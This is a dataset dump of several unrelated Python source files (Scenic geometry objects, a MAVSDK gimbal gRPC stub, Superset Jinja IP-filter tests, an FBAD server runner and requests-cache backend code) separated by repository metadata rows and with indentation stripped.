assert prop not in self.properties
# Normalize types of some built-in properties
if prop == 'position':
value = toVector(value, f'"position" of {self} not a vector')
elif prop == 'heading':
value = toHeading(value, f'"heading" of {self} not a heading')
self.properties.add(prop)
object.__setattr__(self, prop, value)
def _register(self):
pass # do nothing by default; may be overridden by subclasses
def sampleGiven(self, value):
return self.withProperties({ prop: value[getattr(self, prop)]
for prop in self.properties })
def allProperties(self):
return { prop: getattr(self, prop) for prop in self.properties }
def copyWith(self, **overrides):
props = self.allProperties()
props.update(overrides)
return self.withProperties(props)
def isEquivalentTo(self, other):
if type(other) is not type(self):
return False
return areEquivalent(self.allProperties(), other.allProperties())
def __str__(self):
if hasattr(self, 'properties') and 'name' in self.properties:
return self.name
else:
return f'unnamed {self.__class__.__name__} ({id(self)})'
def __repr__(self):
if hasattr(self, 'properties'):
allProps = { prop: getattr(self, prop) for prop in self.properties }
else:
allProps = '<under construction>'
return f'{type(self).__name__}({allProps})'
## Mutators
class Mutator:
"""An object controlling how the ``mutate`` statement affects an `Object`.
A `Mutator` can be assigned to the ``mutator`` property of an `Object` to
control the effect of the ``mutate`` statement. When mutation is enabled
for such an object using that statement, the mutator's `appliedTo` method
is called to compute a mutated version.
"""
def appliedTo(self, obj):
"""Return a mutated copy of the object. Implemented by subclasses."""
raise NotImplementedError
class PositionMutator(Mutator):
"""Mutator adding Gaussian noise to ``position``. Used by `Point`.
Attributes:
stddev (float): standard deviation of noise
"""
def __init__(self, stddev):
self.stddev = stddev
def appliedTo(self, obj):
noise = Vector(random.gauss(0, self.stddev), random.gauss(0, self.stddev))
pos = obj.position + noise
return (obj.copyWith(position=pos), True) # allow further mutation
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (other.stddev == self.stddev)
def __hash__(self):
return hash(self.stddev)
class HeadingMutator(Mutator):
"""Mutator adding Gaussian noise to ``heading``. Used by `OrientedPoint`.
Attributes:
stddev (float): standard deviation of noise
"""
def __init__(self, stddev):
self.stddev = stddev
def appliedTo(self, obj):
noise = random.gauss(0, self.stddev)
h = obj.heading + noise
return (obj.copyWith(heading=h), True) # allow further mutation
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (other.stddev == self.stddev)
def __hash__(self):
return hash(self.stddev)
## Point
class Point(_Constructible):
"""Implementation of the Scenic base class ``Point``.
The default mutator for `Point` adds Gaussian noise to ``position`` with
a standard deviation given by the ``positionStdDev`` property.
Properties:
position (`Vector`; dynamic): Position of the point. Default value is the origin.
visibleDistance (float): Distance for ``can see`` operator. Default value 50.
width (float): Default value zero (only provided for compatibility with
operators that expect an `Object`).
length (float): Default value zero.
.. note::
If you're looking into Scenic's internals, note that `Point` is actually a
subclass of the internal Python class `_Constructible`.
"""
position: PropertyDefault((), {'dynamic'}, lambda self: Vector(0, 0))
width: 0
length: 0
visibleDistance: 50
mutationEnabled: False
mutator: PropertyDefault({'positionStdDev'}, {'additive'},
lambda self: PositionMutator(self.positionStdDev))
positionStdDev: 1
# TODO fix this\
@property
def visibleRegion(self):
return CircularRegion(self.position, self.visibleDistance)
# @cached_property
@property
def corners(self):
return (self.position,)
def toVector(self) -> Vector:
return self.position
# IMPORTANT
def canSee(self, other) -> bool: # TODO improve approximation?
for corner in other.corners:
if self.visibleRegion.containsPoint(corner):
return True
return False
def canSeeHeuristic(self, other):
minDist = float('inf')
for corner in other.corners:
dist = self.visibleRegion.shortestDistanceTo(corner)
# print(dist)
if dist < minDist:
minDist = dist
return minDist
def containedHeuristic(self, container):
maxDist = 0
for corner in self.corners:
dist = container.distanceTo(corner)
if dist > maxDist:
maxDist = dist
return maxDist
def euclidianDist(self, other):
a = self.position
b = other.position
return hypot(a[0]-b[0], a[1]-b[1])
# TODO left/right distance is notthe same as front/back distance
def distRelHeuristic(self, other, loBd, hiBd):
delta = self.euclidianDist(other)
if delta < loBd:
return loBd - delta
elif hiBd is not None and delta > hiBd:
return delta - hiBd
else:
return 0
def distCloseHeuristic(self, other):
return self.distRelHeuristic(other, 0, 10)
def distMedHeuristic(self, other):
return self.distRelHeuristic(other, 10, 20)
def distFarHeuristic(self, other):
return self.distRelHeuristic(other, 20, 50)
def sampleGiven(self, value):
sample = super().sampleGiven(value)
if self.mutationEnabled:
for mutator in self.mutator:
if mutator is None:
continue
sample, proceed = mutator.appliedTo(sample)
if not proceed:
break
return sample
# Points automatically convert to Vectors when needed
def __getattr__(self, attr):
if hasattr(Vector, attr):
return getattr(self.toVector(), attr)
else:
raise AttributeError(f"'{type(self).__name__}' object has no attribute '{attr}'")
## OrientedPoint
class OrientedPoint(Point):
"""Implementation of the Scenic class ``OrientedPoint``.
The default mutator for `OrientedPoint` adds Gaussian noise to ``heading``
with a standard deviation given by the ``headingStdDev`` property, then
applies the mutator for `Point`.
Properties:
heading (float; dynamic): Heading of the `OrientedPoint`. Default value 0
(North).
viewAngle (float): View cone angle for ``can see`` operator. Default
value :math:`2\\pi`.
"""
heading: PropertyDefault((), {'dynamic'}, lambda self: 0)
viewAngle: math.tau
mutator: PropertyDefault({'headingStdDev'}, {'additive'},
lambda self: HeadingMutator(self.headingStdDev))
headingStdDev: math.radians(5)
# TODO fix this
# @cached_property
@property
def visibleRegion(self):
return SectorRegion(self.position, self.visibleDistance,
self.heading, self.viewAngle)
def relativize(self, vec):
pos = self.relativePosition(vec)
return OrientedPoint(position=pos, heading=self.heading)
def relativePosition(self, vec):
return self.position.offsetRotated(self.heading, vec)
def toHeading(self) -> float:
return self.heading
def posRelHeuristic(self, other, heading, dist, angle):
a = viewAngleToPoint(tuple(other.position), self.position, heading)
# endPoint = radialToCartesian(self.position, dist, heading)
# return distanceToSegment(tuple(other.position), self.position, endPoint)
real_ang = abs(a)
inRange = real_ang - angle < 0
return 0 if inRange else real_ang - angle
def toLeftHeuristic(self, other):
return self.posRelHeuristic(other, self.heading+(math.pi / 2), 20, math.atan(2.5/2))
def toRightHeuristic(self, other):
return self.posRelHeuristic(other, self.heading-(math.pi / 2), 20, math.atan(2.5/2))
def inFrontHeuristic(self, other):
return self.posRelHeuristic(other, self.heading, 50, math.atan(2/5))
def behindHeuristic(self, other):
return self.posRelHeuristic(other, self.heading+math.pi, 50, math.atan(2/5))
## Object
class Object(OrientedPoint, _RotatedRectangle):
"""Implementation of the Scenic class ``Object``.
This is the default base class for Scenic classes.
Properties:
width (float): Width of the object, i.e. extent along its X axis.
Default value 1.
length (float): Length of the object, i.e. extent along its Y axis.
Default value 1.
allowCollisions (bool): Whether the object is allowed to intersect
other objects. Default value ``False``.
requireVisible (bool): Whether the object is required to be visible
from the ``ego`` object. Default value ``True``.
regionContainedIn (`Region` or ``None``): A `Region` the object is
required to be contained in. If ``None``, the object need only be
contained in the scenario's workspace.
cameraOffset (`Vector`): Position of the camera for the ``can see``
operator, relative to the object's ``position``. Default ``0 @ 0``.
speed (float; dynamic): Speed in dynamic simulations. Default value 0.
velocity (`Vector`; *dynamic*): Velocity in dynamic simulations. Default value is
the velocity determined by ``self.speed`` and ``self.heading``.
angularSpeed (float; *dynamic*): Angular speed in dynamic simulations. Default
value 0.
behavior: Behavior for dynamic agents, if any (see :ref:`dynamics`). Default
value ``None``.
"""
width: 1
length: 1
allowCollisions: False
requireVisible: True
regionContainedIn: None
cameraOffset: Vector(0, 0)
velocity: PropertyDefault(('speed', 'heading'), {'dynamic'},
lambda self: Vector(0, self.speed).rotatedBy(self.heading))
speed: PropertyDefault((), {'dynamic'}, lambda self: 0)
angularSpeed: PropertyDefault((), {'dynamic'}, lambda self: 0)
behavior: None
lastActions: None
def __new__(cls, *args, **kwargs):
obj = super().__new__(cls)
# The _dynamicProxy attribute stores a mutable copy of the object used during
# simulations, intercepting all attribute accesses to the original object;
# we set this attribute very early to prevent problems during unpickling.
object.__setattr__(obj, '_dynamicProxy', obj)
return obj
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hw = hw = self.width / 2
self.hl = hl = self.length / 2
self.radius = hypot(hw, hl) # circumcircle; for collision detection
self.inradius = min(hw, hl) # incircle; for collision detection
self._relations = []
def _specify(self, prop, value):
# Normalize types of some built-in properties
if prop == 'behavior':
import scenic.syntax.veneer as veneer # TODO improve?
value = toType(value, veneer.Behavior,
f'"behavior" of {self} not a behavior')
super()._specify(prop, value)
def _register(self):
import scenic.syntax.veneer as veneer # TODO improve?
veneer.registerObject(self)
def __getattribute__(self, name):
proxy = object.__getattribute__(self, '_dynamicProxy')
return object.__getattribute__(proxy, name)
def __setattr__(self, name, value):
proxy = object.__getattribute__(self, '_dynamicProxy')
object.__setattr__(proxy, name, value)
def __delattr__(self, name):
proxy = object.__getattribute__(self, '_dynamicProxy')
object.__delattr__(proxy, name)
def startDynamicSimulation(self):
"""Hook called at the beginning of each dynamic simulation.
Does nothing by default; provided for objects to do simulator-specific
initialization as needed.
"""
pass
# TODO fix this
# @cached_property
@property
def left(self):
return self.relativize(Vector(-self.hw, 0))
# @cached_property
@property
def right(self):
return self.relativize(Vector(self.hw, 0))
# @cached_property
@property
def front(self):
return self.relativize(Vector(0, self.hl))
# @cached_property
@property
def back(self):
return self.relativize(Vector(0, -self.hl))
# @cached_property
@property
def frontLeft(self):
return self.relativize(Vector(-self.hw, self.hl))
# @cached_property
@property
def frontRight(self):
return self.relativize(Vector(self.hw, self.hl))
# @cached_property
@property
def backLeft(self):
return self.relativize(Vector(-self.hw, -self.hl))
# @cached_property
@property
def backRight(self):
return self.relativize(Vector(self.hw, -self.hl))
# @cached_property
@property
def visibleRegion(self):
camera = self.position.offsetRotated(self.heading, self.cameraOffset)
return SectorRegion(camera, self.visibleDistance, self.heading, self.viewAngle)
# @cached_property
@property
def corners(self):
# IMPORTANT
hw, hl = self.hw, self.hl
return (
self.relativePosition(Vector(hw, hl)),
self.relativePosition(Vector(-hw, hl)),
self.relativePosition(Vector(-hw, -hl)),
self.relativePosition(Vector(hw, -hl))
)
def show(self, workspace, plt, highlight=False):
if needsSampling(self):
raise RuntimeError('tried to show() symbolic Object')
pos = self.position
spos = workspace.scenicToSchematicCoords(pos)
if highlight:
# Circle around object
rad = 1.5 * max(self.width, self.length)
c = plt.Circle(spos, rad, color='g', fill=False)
plt.gca().add_artist(c)
# View cone
ha = self.viewAngle / 2.0
camera = self.position.offsetRotated(self.heading, self.cameraOffset)
cpos = workspace.scenicToSchematicCoords(camera)
for angle in (-ha, ha):
p = camera.offsetRadially(20, self.heading + angle)
edge = [cpos, workspace.scenicToSchematicCoords(p)]
x, y = zip(*edge)
plt.plot(x, y, 'b:')
corners = [workspace.scenicToSchematicCoords(corner) for corner in self.corners]
x, y = zip(*corners)
color = self.color if hasattr(self, 'color') else (1, 0, 0)
plt.fill(x, y, color=color)
frontMid = averageVectors(corners[0], corners[1])
baseTriangle = [frontMid, corners[2], corners[3]]
triangle = [averageVectors(p, spos, weight=0.5) for p in baseTriangle]
x, y = zip(*triangle)
plt.fill(x, y, "w")
plt.plot(x + (x[0],), y + (y[0],), color="k", linewidth=1)
def enableDynamicProxyFor(obj):
object.__setattr__(obj, '_dynamicProxy', obj.copyWith())
def setDynamicProxyFor(obj, proxy):
object.__setattr__(obj, '_dynamicProxy', proxy)
def disableDynamicProxyFor(obj):
object.__setattr__(obj, '_dynamicProxy', obj)
| 31.100813
| 136
| 0.71935
|
4c1285b1344a85d5d8d85d224f5331988b499350
| 6,458
|
py
|
Python
|
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | 1
|
2020-07-11T10:02:28.000Z
|
2020-07-11T10:02:28.000Z
|
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | null | null | null |
mavsdk/gimbal_pb2_grpc.py
|
deodates-dev/UAV-MAVSDK-Python
|
4743657304ec9c3cac83b290b80b563fea595a8d
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import gimbal_pb2 as gimbal_dot_gimbal__pb2
class GimbalServiceStub(object):
"""Provide control over a gimbal.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.SetPitchAndYaw = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetPitchAndYaw',
request_serializer=gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.FromString,
)
self.SetMode = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetMode',
request_serializer=gimbal_dot_gimbal__pb2.SetModeRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetModeResponse.FromString,
)
self.SetRoiLocation = channel.unary_unary(
'/mavsdk.rpc.gimbal.GimbalService/SetRoiLocation',
request_serializer=gimbal_dot_gimbal__pb2.SetRoiLocationRequest.SerializeToString,
response_deserializer=gimbal_dot_gimbal__pb2.SetRoiLocationResponse.FromString,
)
class GimbalServiceServicer(object):
"""Provide control over a gimbal.
"""
def SetPitchAndYaw(self, request, context):
"""
Set gimbal pitch and yaw angles.
This sets the desired pitch and yaw angles of a gimbal.
Will return when the command is accepted, however, it might
take the gimbal longer to actually be set to the new angles.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMode(self, request, context):
"""
Set gimbal mode.
This sets the desired yaw mode of a gimbal.
Will return when the command is accepted. However, it might
take the gimbal longer to actually be set to the new angles.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetRoiLocation(self, request, context):
"""
Set gimbal region of interest (ROI).
This sets a region of interest that the gimbal will point to.
The gimbal will continue to point to the specified region until it
receives a new command.
The function will return when the command is accepted, however, it might
take the gimbal longer to actually rotate to the ROI.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_GimbalServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'SetPitchAndYaw': grpc.unary_unary_rpc_method_handler(
servicer.SetPitchAndYaw,
request_deserializer=gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.SerializeToString,
),
'SetMode': grpc.unary_unary_rpc_method_handler(
servicer.SetMode,
request_deserializer=gimbal_dot_gimbal__pb2.SetModeRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetModeResponse.SerializeToString,
),
'SetRoiLocation': grpc.unary_unary_rpc_method_handler(
servicer.SetRoiLocation,
request_deserializer=gimbal_dot_gimbal__pb2.SetRoiLocationRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetRoiLocationResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'mavsdk.rpc.gimbal.GimbalService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class GimbalService(object):
"""Provide control over a gimbal.
"""
@staticmethod
def SetPitchAndYaw(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetPitchAndYaw',
gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMode(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetMode',
gimbal_dot_gimbal__pb2.SetModeRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetModeResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetRoiLocation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetRoiLocation',
gimbal_dot_gimbal__pb2.SetRoiLocationRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetRoiLocationResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 41.133758
| 112
| 0.665841
|
376f436412356e63b906a1f862b5f88c30d8c840
| 6,394
|
py
|
Python
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 2
|
2021-03-17T18:41:18.000Z
|
2021-05-27T16:45:12.000Z
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 17
|
2021-03-18T21:17:31.000Z
|
2021-12-06T13:54:03.000Z
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 1
|
2022-01-10T13:31:22.000Z
|
2022-01-10T13:31:22.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from ipaddress import NetmaskValueError, AddressValueError
from jinja_context_addons import *
# Imports Jinja Context Addons from PYTHONPATH env variable, make sure to point the env var to the dir containing it
from tests.base_tests import SupersetTestCase
class Jinja2ContextAddonsTest(SupersetTestCase):
maxDiff = None
# Test for Correctness
def test_ipv4str_to_number_template(self) -> None:
rendered = ipv4str_to_number('192.168.0.0')
self.assertEqual(3232235520, rendered)
def test_render_ipv4_column_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": "1.1.1.1"
},
{
"col": "src_ip_num",
"op": "IN",
"val": ['3.3.3.3', '2.2.2.2']
}
]
rendered = render_ipv4_number_column(test_filter, "src_num_ip")
self.assertEqual(" AND (src_num_ip = 16843009) AND ((src_num_ip = 50529027) OR (src_num_ip = 33686018))", rendered)
def test_render_ipv4_either_number_columns_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": ['3.0.0.0/8', '2.2.2.2']
}
]
rendered = render_ipv4_either_number_columns(test_filter, "src_num_ip", "dst_num_ip")
self.assertEqual(" AND ((src_num_ip >= 50331648 AND src_num_ip <= 67108863) OR (src_num_ip = 33686018) OR (dst_num_ip >= 50331648 AND dst_num_ip <= 67108863) OR (dst_num_ip = 33686018))", rendered)
def test_render_ipv4_between_number_colums_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "LIKE",
"val": ['12.0.0.0/8', '2.0.0.0/16']
}
]
rendered = render_ipv4_between_number_colums(test_filter, '1.1.1.1', '2.2.2.2' )
self.assertEqual(
''' AND (( (1.1.1.1 <= 201326592 AND 2.2.2.2 >= 201326592)
OR (1.1.1.1 <= 218103807 AND 2.2.2.2 >= 218103807)
OR (201326592 <= 1.1.1.1 AND 2.2.2.2 <= 218103807) ) OR ( (1.1.1.1 <= 33554432 AND 2.2.2.2 >= 33554432)
OR (1.1.1.1 <= 33619967 AND 2.2.2.2 >= 33619967)
OR (33554432 <= 1.1.1.1 AND 2.2.2.2 <= 33619967) ))'''
, rendered)
def test_render_in_conditions_template(self) -> None:
test_ip_array=['1.1.1.1','240.0.0.0/4']
rendered = render_in_conditions(test_ip_array, "src_num_ip")
self.assertEqual(['(src_num_ip = 16843009)', '(src_num_ip >= 4026531840 AND src_num_ip <= 4294967295)'], rendered)
def test_dashboard_link_template(self) -> None:
# TODO Update this test once the dashboard function is fully implemented and complete
test_link_label = "LABEL"
test_dashboard_id = 2301
test_src_column = 'test_col'
test_target_column = 'target_col'
rendered = dashboard_link(test_link_label, test_dashboard_id, test_src_column, test_target_column)
self.assertEqual(" concat('<a href=\"http://10.162.232.22:8088/superset/dashboard/2301/?preselect_filters={%22160%22:{%22target_col%22:[%22', target_col, '%22]}}\">LABEL</a>' ) ", rendered)
#Test for Exceptions
def test_ipv4str_to_number_template_invalid_ip(self) -> None:
# Invalid Ip 1912.168.0.0
self.assertRaises(OSError, ipv4str_to_number, '1912.168.0.0')
def test_render_ipv4_column_template_exception(self) -> None:
# The ValueError in this test case comes from the '3.3.3.3/8' CIDR
# This is because the correct way to describe that range of ip's is to start from 3.0.0.0/8
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": "1.1.1.1"
},
{
"col": "src_ip_num",
"op": "IN",
"val": ['3.3.3.3/8']
}
]
self.assertRaises(ValueError, render_ipv4_number_column, test_filter, 'src_ip_num' )
def test_render_ipv4_either_number_columns_template_invalid_cidr(self) -> None:
# Invalid error cidr comes from 2.2.2.200/34
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": ['3.0.0.0/8', '2.2.2.200/34']
}
]
self.assertRaises(NetmaskValueError, render_ipv4_either_number_columns, test_filter, "src_num_ip", "dst_num_ip")
def test_render_ipv4_between_number_colums_template_invalid_arguments(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "2",
"val": ['255.255.255.255/0', '80.0.0.0/16']
}
]
self.assertRaises(ValueError, render_ipv4_between_number_colums, test_filter, '1.1.1.1', '2.2.2.2')
def test_render_in_conditions_template_invalid_cidr(self) -> None:
test_ip_array=['1.10.0.1.1','240.0.0.0/4.0']
self.assertRaises(AddressValueError, render_in_conditions, test_ip_array, "src_num_ip")
def test_dashboard_link_template_invalid_label_type(self) -> None:
# TODO Update this test once the dashboard function is fully implemented and complete
test_link_label = 123
test_dashboard_id = -100
test_src_column = 'test_col'
test_target_column = 'target_col'
self.assertRaises(TypeError, dashboard_link, test_link_label, test_dashboard_id, test_src_column, test_target_column)
| 43.202703
| 205
| 0.613075
|
ee9df0c05c3d8290b5d9d17b3791ec79657b6605
| 1,429
|
py
|
Python
|
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | 1
|
2018-05-01T13:58:48.000Z
|
2018-05-01T13:58:48.000Z
|
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | null | null | null |
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | null | null | null |
"""runner functions for entry points"""
import argparse
import sys
from twisted.internet import reactor
from twisted.python import log
from twisted.internet.endpoints import TCP4ServerEndpoint
from fbad import constants
from fbad.server import FBADServerFactory
def server_main():
"""entry point for the server"""
parser = argparse.ArgumentParser(description="The FBAD Server")
parser.add_argument("-i", "--interface", action="store", help="interface to listen on", default="0.0.0.0")
parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to listen on")
parser.add_argument("-P", "--password", action="store", default=None, help="protect this server using this password")
parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
parser.add_argument("-V", "--version", action="store_true", help="print version and exit")
ns = parser.parse_args()
if ns.version:
import pkg_resources
version = pkg_resources.get_distribution("fbad").version
print("FBAD package version: " + version)
print("FBAD protocol version: " + constants.COM_VERSION)
sys.exit(0)
if ns.verbose:
log.startLogging(sys.stdout)
factory = FBADServerFactory(ns.password)
ep = TCP4ServerEndpoint(reactor, port=ns.port, interface=ns.interface)
ep.listen(factory)
reactor.run()
| 37.605263
| 123
| 0.706088
|
942d14f2d1381fa2aef13df0c78dd672db0aeb12
| 10,502
|
py
|
Python
|
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
import pickle
import warnings
from abc import ABC
from collections.abc import MutableMapping
from datetime import datetime
from logging import DEBUG, WARNING, getLogger
from typing import Iterable, Iterator, Tuple, Union
import requests
from requests.models import PreparedRequest
from ..cache_control import ExpirationTime
from ..cache_keys import create_key, remove_ignored_params, url_to_key
from ..models.response import AnyResponse, CachedResponse
from ..serializers import PickleSerializer, SafePickleSerializer
# Specific exceptions that may be raised during deserialization
DESERIALIZE_ERRORS = (AttributeError, TypeError, ValueError, pickle.PickleError)
ResponseOrKey = Union[CachedResponse, str]
logger = getLogger(__name__)
class BaseCache:
"""Base class for cache implementations, which can also be used as in-memory cache.
See :ref:`advanced_usage:custom backends` for details on creating your own implementation.
"""
def __init__(
self,
*args,
include_get_headers: bool = False,
ignored_parameters: Iterable[str] = None,
**kwargs,
):
self.name = None
self.redirects = {}
self.responses = {}
self.include_get_headers = include_get_headers
self.ignored_parameters = ignored_parameters
@property
def urls(self) -> Iterator[str]:
"""Get all URLs currently in the cache (excluding redirects)"""
for response in self.values():
yield response.url
def save_response(self, response: AnyResponse, key: str = None, expires: datetime = None):
"""Save response to cache
Args:
key: key for this response
response: response to save
expire_after: Time in seconds until this cache item should expire
"""
key = key or self.create_key(response.request)
cached_response = CachedResponse.from_response(response, expires=expires)
cached_response.request = remove_ignored_params(cached_response.request, self.ignored_parameters)
self.responses[key] = cached_response
def save_redirect(self, request: PreparedRequest, response_key: str):
"""
Map a redirect request to a response. This makes it possible to associate many keys with a
single response.
Args:
request: Request object for redirect URL
response_key: Cache key which can be found in ``responses``
"""
self.redirects[self.create_key(request)] = response_key
def get_response(self, key: str, default=None) -> CachedResponse:
"""Retrieves response for `key` if it's stored in cache, otherwise returns `default`
Args:
key: Key of resource
default: Value to return if `key` is not in cache
"""
try:
if key not in self.responses:
key = self.redirects[key]
response = self.responses[key]
response.reset() # In case response was in memory and content has already been read
return response
except KeyError:
return default
except DESERIALIZE_ERRORS as e:
logger.error(f'Unable to deserialize response with key {key}: {str(e)}')
logger.debug(e, exc_info=True)
return default
def delete(self, key: str):
"""Delete a response or redirect from the cache, as well any associated redirect history"""
# If it's a response key, first delete any associated redirect history
try:
for r in self.responses[key].history:
del self.redirects[create_key(r.request, self.ignored_parameters)]
except (KeyError, *DESERIALIZE_ERRORS):
pass
# Then delete the response itself, or just the redirect if it's a redirect key
for cache in [self.responses, self.redirects]:
try:
del cache[key]
except KeyError:
pass
def delete_url(self, url: str):
"""Delete a cached response + redirects for ``GET <url>``"""
self.delete(url_to_key(url, self.ignored_parameters))
def bulk_delete(self, keys: Iterable[str]):
"""Remove multiple responses and their associated redirects from the cache"""
self.responses.bulk_delete(keys)
# Remove any redirects that no longer point to an existing response
invalid_redirects = [k for k, v in self.redirects.items() if v not in self.responses]
self.redirects.bulk_delete(set(keys + invalid_redirects))
def clear(self):
"""Delete all items from the cache"""
logger.info('Clearing all items from the cache')
self.responses.clear()
self.redirects.clear()
def remove_expired_responses(self, expire_after: ExpirationTime = None):
"""Remove expired and invalid responses from the cache, optionally with revalidation
Args:
expire_after: A new expiration time used to revalidate the cache
"""
logger.info(
'Removing expired responses.'
+ (f'Revalidating with: {expire_after}' if expire_after else '')
)
keys_to_update = {}
keys_to_delete = []
for key, response in self._get_valid_responses(delete_invalid=True):
# If we're revalidating and it's not yet expired, update the cached item's expiration
if expire_after is not None and not response.revalidate(expire_after):
keys_to_update[key] = response
if response.is_expired:
keys_to_delete.append(key)
# Delay updates & deletes until the end, to avoid conflicts with _get_valid_responses()
logger.debug(f'Deleting {len(keys_to_delete)} expired responses')
self.bulk_delete(keys_to_delete)
if expire_after is not None:
logger.debug(f'Updating {len(keys_to_update)} revalidated responses')
for key, response in keys_to_update.items():
self.responses[key] = response
def remove_old_entries(self, *args, **kwargs):
msg = 'BaseCache.remove_old_entries() is deprecated; please use CachedSession.remove_expired_responses()'
warnings.warn(DeprecationWarning(msg))
self.remove_expired_responses(*args, **kwargs)
def create_key(self, request: requests.PreparedRequest, **kwargs) -> str:
"""Create a normalized cache key from a request object"""
return create_key(request, self.ignored_parameters, self.include_get_headers, **kwargs)
def has_key(self, key: str) -> bool:
"""Returns `True` if cache has `key`, `False` otherwise"""
return key in self.responses or key in self.redirects
def has_url(self, url: str) -> bool:
"""Returns `True` if cache has `url`, `False` otherwise. Works only for GET request urls"""
return self.has_key(url_to_key(url, self.ignored_parameters)) # noqa: W601
def keys(self) -> Iterator[str]:
"""Get all cache keys for redirects and (valid) responses combined"""
yield from self.redirects.keys()
for key, _ in self._get_valid_responses():
yield key
def values(self) -> Iterator[CachedResponse]:
"""Get all valid response objects from the cache"""
for _, response in self._get_valid_responses():
yield response
def _get_valid_responses(self, delete_invalid=False) -> Iterator[Tuple[str, CachedResponse]]:
"""Get all responses from the cache, and skip (+ optionally delete) any invalid ones that
can't be deserialized"""
keys_to_delete = []
for key in self.responses.keys():
try:
yield key, self.responses[key]
except DESERIALIZE_ERRORS:
keys_to_delete.append(key)
